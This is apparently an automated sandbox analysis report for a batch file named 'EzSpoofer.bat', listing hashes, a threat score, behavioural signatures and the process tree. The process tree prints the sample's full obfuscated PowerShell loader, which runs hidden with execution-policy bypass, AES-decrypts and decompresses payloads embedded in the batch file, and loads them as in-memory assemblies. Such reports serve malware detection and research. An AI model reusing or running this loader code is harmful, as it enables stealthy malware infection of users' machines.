Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-01-2025 18:27
Static task
static1
Behavioral task
behavioral1
Sample
EzSpoofer.bat
Resource
win7-20240903-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
EzSpoofer.bat
Resource
win10v2004-20241007-en
17 signatures
150 seconds
General
-
Target
EzSpoofer.bat
-
Size
290KB
-
MD5
cac585a686a51452504600d4fcf1f7b3
-
SHA1
cff487749ee57d6a6228622776392fa80d85041e
-
SHA256
876279d2efe790bf2e60a1d6bae02b08228a485d208151a5b1278e2fd11e2369
-
SHA512
0364f3e26c03ad92ac447aa446304dd7da7a46916ae62e70380529177416964b543da4df08e0e46221f57196513a062cc46eb80d02f2c52ea2c0cd7989e1aea9
-
SSDEEP
6144:ikknMyCyb4UpNDYSBObHBnWxp/3f8ZWftYQcuKPprtHnnWd:iOib449YFFnYf9xcbrNnq
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2228 powershell.exe -
Deletes itself 1 IoCs
pid Process 2328 cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2228 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2328 wrote to memory of 2228 2328 cmd.exe 31 PID 2328 wrote to memory of 2228 2328 cmd.exe 31 PID 2328 wrote to memory of 2228 2328 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LzMyn9z48x0Q4gbuWdOuMvyklX2ZjqkWkuihkCRVIvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pe5tId8jJVo1uZ0oyFBZYg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YAedb=New-Object System.IO.MemoryStream(,$param_var); $lZKKA=New-Object System.IO.MemoryStream; $QbfIR=New-Object System.IO.Compression.GZipStream($YAedb, [IO.Compression.CompressionMode]::Decompress); $QbfIR.CopyTo($lZKKA); $QbfIR.Dispose(); $YAedb.Dispose(); $lZKKA.Dispose(); $lZKKA.ToArray();}function execute_function($param_var,$param2_var){ $YrspZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $otogi=$YrspZ.EntryPoint; $otogi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$EprqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($hFcVg in $EprqD) { if ($hFcVg.StartsWith(':: ')) { $ccxXr=$hFcVg.Substring(3); break; }}$payloads_var=[string[]]$ccxXr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-